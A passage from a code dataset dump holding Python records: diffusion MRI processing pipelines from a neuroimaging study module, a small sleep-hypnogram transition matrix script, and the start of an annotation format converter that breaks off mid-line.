\"\n \"Used in building the connectome\")),\n InputFilesetSpec('reverse_phase', STD_IMAGE_FORMATS, optional=True),\n FilesetSpec('grad_dirs', fsl_bvecs_format, 'preprocess_pipeline'),\n FilesetSpec('grad_dirs_coreg', fsl_bvecs_format,\n 'series_coreg_pipeline',\n desc=(\"The gradient directions coregistered to the \"\n \"orientation of the coreg reference\")),\n FilesetSpec('bvalues', fsl_bvals_format, 'preprocess_pipeline',\n desc=(\"\")),\n FilesetSpec('eddy_par', eddy_par_format, 'preprocess_pipeline',\n desc=(\"\")),\n FilesetSpec('noise_residual', mrtrix_image_format,\n 'preprocess_pipeline',\n desc=(\"\")),\n FilesetSpec('tensor', nifti_gz_format, 'tensor_pipeline',\n desc=(\"\")),\n FilesetSpec('fa', nifti_gz_format, 'tensor_metrics_pipeline',\n desc=(\"\")),\n FilesetSpec('adc', nifti_gz_format, 'tensor_metrics_pipeline',\n desc=(\"\")),\n FilesetSpec('wm_response', text_format, 'response_pipeline',\n desc=(\"\")),\n FilesetSpec('gm_response', text_format, 'response_pipeline',\n desc=(\"\")),\n FilesetSpec('csf_response', text_format, 'response_pipeline',\n desc=(\"\")),\n FilesetSpec('avg_response', text_format, 'average_response_pipeline',\n desc=(\"\")),\n FilesetSpec('wm_odf', mrtrix_image_format, 'fod_pipeline',\n desc=(\"\")),\n FilesetSpec('gm_odf', mrtrix_image_format, 'fod_pipeline',\n desc=(\"\")),\n FilesetSpec('csf_odf', mrtrix_image_format, 'fod_pipeline',\n desc=(\"\")),\n FilesetSpec('norm_intensity', mrtrix_image_format,\n 'intensity_normalisation_pipeline',\n desc=(\"\")),\n FilesetSpec('norm_intens_fa_template', mrtrix_image_format,\n 'intensity_normalisation_pipeline', frequency='per_study',\n desc=(\"\")),\n FilesetSpec('norm_intens_wm_mask', mrtrix_image_format,\n 'intensity_normalisation_pipeline', frequency='per_study',\n desc=(\"\")),\n FilesetSpec('global_tracks', mrtrix_track_format,\n 'global_tracking_pipeline',\n desc=(\"\")),\n FilesetSpec('wm_mask', mrtrix_image_format,\n 'global_tracking_pipeline',\n desc=(\"\")),\n FilesetSpec('connectome', csv_format, 'connectome_pipeline',\n desc=(\"\"))]\n\n add_param_specs = [\n ParamSpec('multi_tissue', True,\n desc=(\"\")),\n ParamSpec('preproc_pe_dir', None, dtype=str,\n desc=(\"\")),\n ParamSpec('tbss_skel_thresh', 0.2,\n desc=(\"\")),\n ParamSpec('fsl_mask_f', 0.25,\n desc=(\"\")),\n ParamSpec('bet_robust', True,\n desc=(\"\")),\n ParamSpec('bet_f_threshold', 0.2,\n desc=(\"\")),\n ParamSpec('bet_reduce_bias', False,\n desc=(\"\")),\n ParamSpec('num_global_tracks', int(1e9),\n desc=(\"\")),\n ParamSpec('global_tracks_cutoff', 0.05,\n desc=(\"\")),\n SwitchSpec('preproc_denoise', False,\n desc=(\"\")),\n SwitchSpec('response_algorithm', 'tax',\n ('tax', 'dhollander', 'msmt_5tt'),\n desc=(\"\")),\n SwitchSpec('fod_algorithm', 'csd', ('csd', 'msmt_csd'),\n desc=(\"\")),\n MriStudy.param_spec('bet_method').with_new_choices('mrtrix'),\n SwitchSpec('reorient2std', False,\n desc=(\"\"))]\n\n primary_bids_input = BidsInputs(\n spec_name='series', type='dwi',\n valid_formats=(nifti_gz_x_format, nifti_gz_format))\n\n default_bids_inputs = [primary_bids_input,\n BidsAssocInputs(\n spec_name='bvalues',\n primary=primary_bids_input,\n association='grads',\n type='bval',\n format=fsl_bvals_format),\n BidsAssocInputs(\n spec_name='grad_dirs',\n primary=primary_bids_input,\n association='grads',\n type='bvec',\n format=fsl_bvecs_format),\n BidsAssocInputs(\n spec_name='reverse_phase',\n primary=primary_bids_input,\n association='epi',\n format=nifti_gz_format,\n drop_if_missing=True)]\n\n 
RECOMMENDED_NUM_SESSIONS_FOR_INTENS_NORM = 5\n\n primary_scan_name = 'series'\n\n @property\n def multi_tissue(self):\n return self.branch('response_algorithm',\n ('msmt_5tt', 'dhollander'))\n\n def fsl_grads(self, pipeline, coregistered=True):\n \"Adds and returns a node to the pipeline to merge the FSL grads and \"\n \"bvecs\"\n try:\n fslgrad = pipeline.node('fslgrad')\n except ArcanaNameError:\n if self.is_coregistered and coregistered:\n grad_dirs = 'grad_dirs_coreg'\n else:\n grad_dirs = 'grad_dirs'\n # Gradient merge node\n fslgrad = pipeline.add(\n \"fslgrad\",\n MergeTuple(2),\n inputs={\n 'in1': (grad_dirs, fsl_bvecs_format),\n 'in2': ('bvalues', fsl_bvals_format)})\n return (fslgrad, 'out')\n\n def extract_magnitude_pipeline(self, **name_maps):\n\n pipeline = self.new_pipeline(\n 'extract_magnitude',\n desc=\"Extracts the first b==0 volume from the series\",\n citations=[],\n name_maps=name_maps)\n\n dwiextract = pipeline.add(\n 'dwiextract',\n ExtractDWIorB0(\n bzero=True,\n out_ext='.nii.gz'),\n inputs={\n 'in_file': ('series', nifti_gz_format),\n 'fslgrad': self.fsl_grads(pipeline, coregistered=False)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n pipeline.add(\n \"extract_first_vol\",\n MRConvert(\n coord=(3, 0)),\n inputs={\n 'in_file': (dwiextract, 'out_file')},\n outputs={\n 'magnitude': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def preprocess_pipeline(self, **name_maps):\n \"\"\"\n Performs a series of FSL preprocessing steps, including Eddy and Topup\n\n Parameters\n ----------\n phase_dir : str{AP|LR|IS}\n The phase encode direction\n \"\"\"\n\n # Determine whether we can correct for distortion, i.e. if reference\n # scans are provided\n # Include all references\n references = [fsl_cite, eddy_cite, topup_cite,\n distort_correct_cite, n4_cite]\n if self.branch('preproc_denoise'):\n references.extend(dwidenoise_cites)\n\n pipeline = self.new_pipeline(\n name='preprocess',\n name_maps=name_maps,\n desc=(\n \"Preprocess dMRI studies using distortion correction\"),\n citations=references)\n\n # Create nodes to gradients to FSL format\n if self.input('series').format == dicom_format:\n extract_grad = pipeline.add(\n \"extract_grad\",\n ExtractFSLGradients(),\n inputs={\n 'in_file': ('series', dicom_format)},\n outputs={\n 'grad_dirs': ('bvecs_file', fsl_bvecs_format),\n 'bvalues': ('bvals_file', fsl_bvals_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n grad_fsl_inputs = {'in1': (extract_grad, 'bvecs_file'),\n 'in2': (extract_grad, 'bvals_file')}\n elif self.provided('grad_dirs') and self.provided('bvalues'):\n grad_fsl_inputs = {'in1': ('grad_dirs', fsl_bvecs_format),\n 'in2': ('bvalues', fsl_bvals_format)}\n else:\n raise BananaUsageError(\n \"Either input 'magnitude' image needs to be in DICOM format \"\n \"or gradient directions and b-values need to be explicitly \"\n \"provided to {}\".format(self))\n\n # Gradient merge node\n grad_fsl = pipeline.add(\n \"grad_fsl\",\n MergeTuple(2),\n inputs=grad_fsl_inputs)\n\n gradients = (grad_fsl, 'out')\n\n # Create node to reorient preproc out_file\n if self.branch('reorient2std'):\n reorient = pipeline.add(\n 'fslreorient2std',\n fsl.utils.Reorient2Std(\n output_type='NIFTI_GZ'),\n inputs={\n 'in_file': ('series', nifti_gz_format)},\n requirements=[fsl_req.v('5.0.9')])\n reoriented = (reorient, 'out_file')\n else:\n reoriented = ('series', nifti_gz_format)\n\n # Denoise the dwi-scan\n if self.branch('preproc_denoise'):\n # Run denoising\n denoise = pipeline.add(\n 
'denoise',\n DWIDenoise(),\n inputs={\n 'in_file': reoriented},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Calculate residual noise\n subtract_operands = pipeline.add(\n 'subtract_operands',\n Merge(2),\n inputs={\n 'in1': reoriented,\n 'in2': (denoise, 'noise')})\n\n pipeline.add(\n 'subtract',\n MRCalc(\n operation='subtract'),\n inputs={\n 'operands': (subtract_operands, 'out')},\n outputs={\n 'noise_residual': ('out_file', mrtrix_image_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n denoised = (denoise, 'out_file')\n else:\n denoised = reoriented\n\n # Preproc kwargs\n preproc_kwargs = {}\n preproc_inputs = {'in_file': denoised,\n 'grad_fsl': gradients}\n\n if self.provided('reverse_phase'):\n\n if self.provided('magnitude', default_okay=False):\n dwi_reference = ('magnitude', mrtrix_image_format)\n else:\n # Extract b=0 volumes\n dwiextract = pipeline.add(\n 'dwiextract',\n ExtractDWIorB0(\n bzero=True,\n out_ext='.nii.gz'),\n inputs={\n 'in_file': denoised,\n 'fslgrad': gradients},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Get first b=0 from dwi b=0 volumes\n extract_first_b0 = pipeline.add(\n \"extract_first_vol\",\n MRConvert(\n coord=(3, 0)),\n inputs={\n 'in_file': (dwiextract, 'out_file')},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n dwi_reference = (extract_first_b0, 'out_file')\n\n # Concatenate extracted forward rpe with reverse rpe\n combined_images = pipeline.add(\n 'combined_images',\n MRCat(),\n inputs={\n 'first_scan': dwi_reference,\n 'second_scan': ('reverse_phase', mrtrix_image_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Create node to assign the right PED to the diffusion\n prep_dwi = pipeline.add(\n 'prepare_dwi',\n PrepareDWI(),\n inputs={\n 'pe_dir': ('ped', float),\n 'ped_polarity': ('pe_angle', float)})\n\n preproc_kwargs['rpe_pair'] = True\n\n distortion_correction = True\n preproc_inputs['se_epi'] = (combined_images, 'out_file')\n else:\n distortion_correction = False\n preproc_kwargs['rpe_none'] = True\n\n if self.parameter('preproc_pe_dir') is not None:\n preproc_kwargs['pe_dir'] = self.parameter('preproc_pe_dir')\n\n preproc = pipeline.add(\n 'dwipreproc',\n DWIPreproc(\n no_clean_up=True,\n out_file_ext='.nii.gz',\n # FIXME: Need to determine this programmatically\n # eddy_parameters = '--data_is_shelled '\n temp_dir='dwipreproc_tempdir',\n **preproc_kwargs),\n inputs=preproc_inputs,\n outputs={\n 'eddy_par': ('eddy_parameters', eddy_par_format)},\n requirements=[mrtrix_req.v('3.0rc3'), fsl_req.v('5.0.10')],\n wall_time=60)\n\n if distortion_correction:\n pipeline.connect(prep_dwi, 'pe', preproc, 'pe_dir')\n\n mask = pipeline.add(\n 'dwi2mask',\n BrainMask(\n out_file='brainmask.nii.gz'),\n inputs={\n 'in_file': (preproc, 'out_file'),\n 'grad_fsl': gradients},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Create bias correct node\n pipeline.add(\n \"bias_correct\",\n DWIBiasCorrect(\n method='ants'),\n inputs={\n 'grad_fsl': gradients, # internal\n 'in_file': (preproc, 'out_file'),\n 'mask': (mask, 'out_file')},\n outputs={\n 'series_preproc': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3'), ants_req.v('2.0')])\n\n return pipeline\n\n def brain_extraction_pipeline(self, **name_maps):\n \"\"\"\n Generates a whole brain mask using MRtrix's 'dwi2mask' command\n\n Parameters\n ----------\n mask_tool: Str\n Can be either 'bet' or 'dwi2mask' depending on which mask tool you\n want to use\n \"\"\"\n\n if self.branch('bet_method', 'mrtrix'):\n pipeline = self.new_pipeline(\n 'brain_extraction',\n desc=\"Generate 
brain mask from b0 images\",\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n if self.provided('coreg_ref'):\n series = 'series_coreg'\n else:\n series = 'series_preproc'\n\n # Create mask node\n masker = pipeline.add(\n 'dwi2mask',\n BrainMask(\n out_file='brain_mask.nii.gz'),\n inputs={\n 'in_file': (series, nifti_gz_format),\n 'grad_fsl': self.fsl_grads(pipeline, coregistered=False)},\n outputs={\n 'brain_mask': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n merge = pipeline.add(\n 'merge_operands',\n Merge(2),\n inputs={\n 'in1': ('mag_preproc', nifti_gz_format),\n 'in2': (masker, 'out_file')})\n\n pipeline.add(\n 'apply_mask',\n MRCalc(\n operation='multiply'),\n inputs={\n 'operands': (merge, 'out')},\n outputs={\n 'brain': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n else:\n pipeline = super().brain_extraction_pipeline(**name_maps)\n return pipeline\n\n def series_coreg_pipeline(self, **name_maps):\n\n pipeline = super().series_coreg_pipeline(**name_maps)\n\n # Apply coregistration transform to gradients\n pipeline.add(\n 'transform_grads',\n TransformGradients(),\n inputs={\n 'gradients': ('grad_dirs', fsl_bvecs_format),\n 'transform': ('coreg_fsl_mat', text_matrix_format)},\n outputs={\n 'grad_dirs_coreg': ('transformed', fsl_bvecs_format)})\n\n return pipeline\n\n def intensity_normalisation_pipeline(self, **name_maps):\n\n if self.num_sessions < 2:\n raise ArcanaMissingDataException(\n \"Cannot normalise intensities of DWI images as study only \"\n \"contains a single session\")\n elif self.num_sessions < self.RECOMMENDED_NUM_SESSIONS_FOR_INTENS_NORM:\n logger.warning(\n \"The number of sessions in the study ({}) is less than the \"\n \"recommended number for intensity normalisation ({}). 
The \"\n \"results may be unreliable\".format(\n self.num_sessions,\n self.RECOMMENDED_NUM_SESSIONS_FOR_INTENS_NORM))\n\n pipeline = self.new_pipeline(\n name='intensity_normalization',\n desc=\"Corrects for B1 field inhomogeneity\",\n citations=[mrtrix_req.v('3.0rc3')],\n name_maps=name_maps)\n\n mrconvert = pipeline.add(\n 'mrconvert',\n MRConvert(\n out_ext='.mif'),\n inputs={\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format),\n 'grad_fsl': self.fsl_grads(pipeline)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Pair subject and visit ids together, expanding so they can be\n # joined and chained together\n session_ids = pipeline.add(\n 'session_ids',\n utility.IdentityInterface(\n ['subject_id', 'visit_id']),\n inputs={\n 'subject_id': (Study.SUBJECT_ID, int),\n 'visit_id': (Study.VISIT_ID, int)})\n\n # Set up join nodes\n join_fields = ['dwis', 'masks', 'subject_ids', 'visit_ids']\n join_over_subjects = pipeline.add(\n 'join_over_subjects',\n utility.IdentityInterface(\n join_fields),\n inputs={\n 'masks': (self.brain_mask_spec_name, nifti_gz_format),\n 'dwis': (mrconvert, 'out_file'),\n 'subject_ids': (session_ids, 'subject_id'),\n 'visit_ids': (session_ids, 'visit_id')},\n joinsource=self.SUBJECT_ID,\n joinfield=join_fields)\n\n join_over_visits = pipeline.add(\n 'join_over_visits',\n Chain(\n join_fields),\n inputs={\n 'dwis': (join_over_subjects, 'dwis'),\n 'masks': (join_over_subjects, 'masks'),\n 'subject_ids': (join_over_subjects, 'subject_ids'),\n 'visit_ids': (join_over_subjects, 'visit_ids')},\n joinsource=self.VISIT_ID,\n joinfield=join_fields)\n\n # Intensity normalization\n intensity_norm = pipeline.add(\n 'dwiintensitynorm',\n DWIIntensityNorm(),\n inputs={\n 'in_files': (join_over_visits, 'dwis'),\n 'masks': (join_over_visits, 'masks')},\n outputs={\n 'norm_intens_fa_template': ('fa_template',\n mrtrix_image_format),\n 'norm_intens_wm_mask': ('wm_mask', mrtrix_image_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Set up expand nodes\n pipeline.add(\n 'expand', SelectSession(),\n inputs={\n 'subject_ids': (join_over_visits, 'subject_ids'),\n 'visit_ids': (join_over_visits, 'visit_ids'),\n 'inlist': (intensity_norm, 'out_files'),\n 'subject_id': (Study.SUBJECT_ID, int),\n 'visit_id': (Study.VISIT_ID, int)},\n outputs={\n 'norm_intensity': ('item', mrtrix_image_format)})\n\n # Connect inputs\n return pipeline\n\n def tensor_pipeline(self, **name_maps):\n \"\"\"\n Fits the apparrent diffusion tensor (DT) to each voxel of the image\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='tensor',\n desc=(\"Estimates the apparent diffusion tensor in each \"\n \"voxel\"),\n citations=[],\n name_maps=name_maps)\n\n # Create tensor fit node\n pipeline.add(\n 'dwi2tensor',\n FitTensor(\n out_file='dti.nii.gz'),\n inputs={\n 'grad_fsl': self.fsl_grads(pipeline),\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format),\n 'in_mask': (self.brain_mask_spec_name, nifti_gz_format)},\n outputs={\n 'tensor': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def tensor_metrics_pipeline(self, **name_maps):\n \"\"\"\n Fits the apparrent diffusion tensor (DT) to each voxel of the image\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='fa',\n desc=(\"Calculates the FA and ADC from a tensor image\"),\n citations=[],\n name_maps=name_maps)\n\n # Create tensor fit node\n pipeline.add(\n 'metrics',\n TensorMetrics(\n out_fa='fa.nii.gz',\n out_adc='adc.nii.gz'),\n inputs={\n 'in_file': ('tensor', nifti_gz_format),\n 'in_mask': 
(self.brain_mask_spec_name, nifti_gz_format)},\n outputs={\n 'fa': ('out_fa', nifti_gz_format),\n 'adc': ('out_adc', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def response_pipeline(self, **name_maps):\n \"\"\"\n Estimates the fibre orientation distribution (FOD) using constrained\n spherical deconvolution\n\n Parameters\n ----------\n response_algorithm : str\n Algorithm used to estimate the response\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='response',\n desc=(\"Estimates the fibre response function\"),\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n # Create fod fit node\n response = pipeline.add(\n 'response',\n ResponseSD(\n algorithm=self.parameter('response_algorithm')),\n inputs={\n 'grad_fsl': self.fsl_grads(pipeline),\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format),\n 'in_mask': (self.brain_mask_spec_name, nifti_gz_format)},\n outputs={\n 'wm_response': ('wm_file', text_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Connect to outputs\n if self.multi_tissue:\n response.inputs.gm_file = 'gm.txt',\n response.inputs.csf_file = 'csf.txt',\n pipeline.connect_output('gm_response', response, 'gm_file',\n text_format)\n pipeline.connect_output('csf_response', response, 'csf_file',\n text_format)\n\n return pipeline\n\n def average_response_pipeline(self, **name_maps):\n \"\"\"\n Averages the estimate response function over all subjects in the\n project\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='average_response',\n desc=(\n \"Averages the fibre response function over the project\"),\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n join_subjects = pipeline.add(\n 'join_subjects',\n utility.IdentityInterface(['responses']),\n inputs={\n 'responses': ('wm_response', text_format)},\n outputs={},\n joinsource=self.SUBJECT_ID,\n joinfield=['responses'])\n\n join_visits = pipeline.add(\n 'join_visits',\n Chain(['responses']),\n inputs={\n 'responses': (join_subjects, 'responses')},\n joinsource=self.VISIT_ID,\n joinfield=['responses'])\n\n pipeline.add(\n 'avg_response',\n AverageResponse(),\n inputs={\n 'in_files': (join_visits, 'responses')},\n outputs={\n 'avg_response': ('out_file', text_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def fod_pipeline(self, **name_maps):\n \"\"\"\n Estimates the fibre orientation distribution (FOD) using constrained\n spherical deconvolution\n\n Parameters\n ----------\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='fod',\n desc=(\"Estimates the fibre orientation distribution in each\"\n \" voxel\"),\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n # Create fod fit node\n dwi2fod = pipeline.add(\n 'dwi2fod',\n EstimateFOD(\n algorithm=self.parameter('fod_algorithm')),\n inputs={\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format),\n 'wm_txt': ('wm_response', text_format),\n 'mask_file': (self.brain_mask_spec_name, nifti_gz_format),\n 'grad_fsl': self.fsl_grads(pipeline)},\n outputs={\n 'wm_odf': ('wm_odf', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n if self.multi_tissue:\n dwi2fod.inputs.gm_odf = 'gm.mif',\n dwi2fod.inputs.csf_odf = 'csf.mif',\n pipeline.connect_input('gm_response', dwi2fod, 'gm_txt',\n text_format),\n pipeline.connect_input('csf_response', dwi2fod, 'csf_txt',\n text_format),\n pipeline.connect_output('gm_odf', dwi2fod, 'gm_odf',\n nifti_gz_format),\n pipeline.connect_output('csf_odf', dwi2fod, 'csf_odf',\n nifti_gz_format),\n # Check inputs/output are connected\n return pipeline\n\n 
def extract_b0_pipeline(self, **name_maps):\n \"\"\"\n Extracts the b0 images from a DWI study and takes their mean\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='extract_b0',\n desc=\"Extract b0 image from a DWI study\",\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n # Extraction node\n extract_b0s = pipeline.add(\n 'extract_b0s',\n ExtractDWIorB0(\n bzero=True,\n quiet=True),\n inputs={\n 'fslgrad': self.fsl_grads(pipeline),\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # FIXME: Need a registration step before the mean\n # Mean calculation node\n mean = pipeline.add(\n \"mean\",\n MRMath(\n axis=3,\n operation='mean',\n quiet=True),\n inputs={\n 'in_files': (extract_b0s, 'out_file')},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Convert to Nifti\n pipeline.add(\n \"output_conversion\",\n MRConvert(\n out_ext='.nii.gz',\n quiet=True),\n inputs={\n 'in_file': (mean, 'out_file')},\n outputs={\n 'b0': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def global_tracking_pipeline(self, **name_maps):\n\n pipeline = self.new_pipeline(\n name='global_tracking',\n desc=\"Extract b0 image from a DWI study\",\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n mask = pipeline.add(\n 'mask',\n DWI2Mask(),\n inputs={\n 'grad_fsl': self.fsl_grads(pipeline),\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n tracking = pipeline.add(\n 'tracking',\n Tractography(\n select=self.parameter('num_global_tracks'),\n cutoff=self.parameter('global_tracks_cutoff')),\n inputs={\n 'seed_image': (mask, 'out_file'),\n 'in_file': ('wm_odf', mrtrix_image_format)},\n outputs={\n 'global_tracks': ('out_file', mrtrix_track_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n if self.provided('anat_5tt'):\n pipeline.connect_input('anat_5tt', tracking, 'act_file',\n mrtrix_image_format)\n\n return pipeline\n\n def intrascan_alignment_pipeline(self, **name_maps):\n\n pipeline = self.new_pipeline(\n name='affine_mat_generation',\n desc=(\"Generation of the affine matrices for the main dwi \"\n \"sequence starting from eddy motion parameters\"),\n citations=[fsl_cite],\n name_maps=name_maps)\n\n pipeline.add(\n 'gen_aff_mats',\n AffineMatrixGeneration(),\n inputs={\n 'reference_image': ('mag_preproc', nifti_gz_format),\n 'motion_parameters': ('eddy_par', eddy_par_format)},\n outputs={\n 'align_mats': ('affine_matrices', motion_mats_format)})\n\n return pipeline\n\n def connectome_pipeline(self, **name_maps):\n\n pipeline = self.new_pipeline(\n name='connectome',\n desc=(\"Generate a connectome from whole brain connectivity\"),\n citations=[],\n name_maps=name_maps)\n\n aseg_path = pipeline.add(\n 'aseg_path',\n AppendPath(\n sub_paths=['mri', 'aparc+aseg.mgz']),\n inputs={\n 'base_path': ('anat_fs_recon_all', directory_format)})\n\n pipeline.add(\n 'connectome',\n mrtrix3.BuildConnectome(),\n inputs={\n 'in_file': ('global_tracks', mrtrix_track_format),\n 'in_parc': (aseg_path, 'out_path')},\n outputs={\n 'connectome': ('out_file', csv_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n\nclass DwiRefStudy(EpiStudy, metaclass=StudyMetaClass):\n\n add_data_specs = [\n InputFilesetSpec('reverse_phase', STD_IMAGE_FORMATS, optional=True)\n ]\n\n desc = (\"A special study used in the MR-PET motion correction algorithm to\"\n \" perform distortion correction on the reverse-phase/reference b0 \"\n \"scans by flipping it around 
and using the DWI series as the \"\n \"reference\")\n\n def preprocess_pipeline(self, **name_maps):\n\n if self.provided('reverse_phase'):\n return self._topup_pipeline(**name_maps)\n else:\n return super().preprocess_pipeline(**name_maps)\n\n def _topup_pipeline(self, **name_maps):\n \"\"\"\n Implementation of separate topup pipeline, moved from EPI study as it\n is only really relevant for spin-echo DWI. Need to work out what to do\n with it\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='preprocess_pipeline',\n desc=(\"Topup distortion correction pipeline\"),\n citations=[fsl_cite],\n name_maps=name_maps)\n\n reorient_epi_in = pipeline.add(\n 'reorient_epi_in',\n fsl.utils.Reorient2Std(),\n inputs={\n 'in_file': ('magnitude', nifti_gz_format)},\n requirements=[fsl_req.v('5.0.9')])\n\n reorient_epi_opposite = pipeline.add(\n 'reorient_epi_opposite',\n fsl.utils.Reorient2Std(),\n inputs={\n 'in_file': ('reverse_phase', nifti_gz_format)},\n requirements=[fsl_req.v('5.0.9')])\n\n prep_dwi = pipeline.add(\n 'prepare_dwi',\n PrepareDWI(\n topup=True),\n inputs={\n 'pe_dir': ('ped', str),\n 'ped_polarity': ('pe_angle', str),\n 'dwi': (reorient_epi_in, 'out_file'),\n 'dwi1': (reorient_epi_opposite, 'out_file')})\n\n ped = pipeline.add(\n 'gen_config',\n GenTopupConfigFiles(),\n inputs={\n 'ped': (prep_dwi, 'pe')})\n\n merge_outputs = pipeline.add(\n 'merge_files',\n merge_lists(2),\n inputs={\n 'in1': (prep_dwi, 'main'),\n 'in2': (prep_dwi, 'secondary')})\n\n merge = pipeline.add(\n 'FslMerge',\n FslMerge(\n dimension='t',\n output_type='NIFTI_GZ'),\n inputs={\n 'in_files': (merge_outputs, 'out')},\n requirements=[fsl_req.v('5.0.9')])\n\n topup = pipeline.add(\n 'topup',\n TOPUP(\n output_type='NIFTI_GZ'),\n inputs={\n 'in_file': (merge, 'merged_file'),\n 'encoding_file': (ped, 'config_file')},\n requirements=[fsl_req.v('5.0.9')])\n\n in_apply_tp = pipeline.add(\n 'in_apply_tp',\n merge_lists(1),\n inputs={\n 'in1': (reorient_epi_in, 'out_file')})\n\n pipeline.add(\n 'applytopup',\n ApplyTOPUP(\n method='jac',\n in_index=[1],\n output_type='NIFTI_GZ'),\n inputs={\n 'in_files': (in_apply_tp, 'out'),\n 'encoding_file': (ped, 'apply_topup_config'),\n 'in_topup_movpar': (topup, 'out_movpar'),\n 'in_topup_fieldcoef': (topup, 'out_fieldcoef')},\n outputs={\n 'mag_preproc': ('out_corrected', nifti_gz_format)},\n requirements=[fsl_req.v('5.0.9')])\n\n return pipeline\n","sub_path":"banana/study/mri/dwi.py","file_name":"dwi.py","file_ext":"py","file_size_in_byte":37361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"569412882","text":"import json\nimport numpy as np\n\ndef create_transition_matrix():\n transition_matrix = np.ones((5,5))\n a = json.loads(open(\"data.json\", 'r').read())\n all_data = a['sleep']\n \n counter, average_length = 0, 0;\n for day in all_data:\n if 'hypnogram_5min' in day:\n average_length += len(day['hypnogram_5min'])\n counter +=1\n\n prob_matrix = np.ones((average_length//counter, 5))\n\n for day in all_data:\n if 'hypnogram_5min' in day:\n for timestep in range(len(day['hypnogram_5min'])-1):\n i, j = day['hypnogram_5min'][timestep], day['hypnogram_5min'][timestep+1]\n transition_matrix[i, j] += 1\n if timestep < average_length//counter:\n if i == 1:\n prob_matrix[timestep, i] += 4\n prob_matrix[timestep, i] += 1\n return transition_matrix, 
prob_matrix\n","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"38121845","text":"'''\n\nThis object will receive the strategy from outside and will convert according to\n said strategy.\n\n'''\n\nimport glob\nimport os\nimport json\nimport shutil\nimport time\n\nfrom tqdm import tqdm\n\nfrom .coco_converters.coco_strategies import CocoObjectDetectionStrategy, CocoKeypointDetectionStrategy, CocoPanopticConverterStrategy\nfrom .voc_converters.voc_strategies import VocObjectDetectionStrategy\nfrom .labelbox_converters.labelbox_strategies import LabelBoxObjectDetectionStrategy\nfrom .dataloop_converters.dataloop_strategies import DataLoopObjectDetectionStrategy\nfrom .supervisely_converters.supervisely_strategies import SuperviselyObjectDetectionStrategy\nfrom .vott_converters.vott_strategies import VoTTObjectDetectionStrategy\nfrom .sagemaker_converters.sagemaker_strategies import SageMakerObjectDetectionStrategy\nfrom .vgg_converters.vgg_strategies import VGGObjectDetectionStrategy\nfrom .googlecloud_converters.googlecloud_strategies import GoogleCloudObjectDetectionStrategy\nfrom .yolo_converters.yolo_strategies import YoloObjectDetectionStrategy\n\n\nclass Converter(object):\n def __init__(self, args):\n self.output_dir = args.output_dir\n self._select_strategy(args)\n\n def convert_from_sa(self):\n self.strategy.sa_to_output_format()\n\n def convert_to_sa(self, platform):\n self.strategy.to_sa_format()\n\n def __set_strategy(self, c_strategy):\n self.strategy = c_strategy\n\n def _select_strategy(self, args):\n if args.dataset_format == \"COCO\":\n if args.task == 'instance_segmentation' or args.task == 'object_detection':\n c_strategy = CocoObjectDetectionStrategy(args)\n if args.task == 'keypoint_detection':\n c_strategy = CocoKeypointDetectionStrategy(args)\n if args.task == 'panoptic_segmentation':\n c_strategy = CocoPanopticConverterStrategy(args)\n elif args.dataset_format == \"VOC\":\n if args.task == 'instance_segmentation' or args.task == 'object_detection':\n c_strategy = VocObjectDetectionStrategy(args)\n elif args.dataset_format == \"LabelBox\":\n if args.task == \"object_detection\" or args.task == 'instance_segmentation' or args.task == 'vector_annotation':\n c_strategy = LabelBoxObjectDetectionStrategy(args)\n elif args.dataset_format == \"DataLoop\":\n if args.task == 'object_detection' or args.task == 'instance_segmentation' or args.task == 'vector_annotation':\n c_strategy = DataLoopObjectDetectionStrategy(args)\n elif args.dataset_format == \"Supervisely\":\n if args.task == 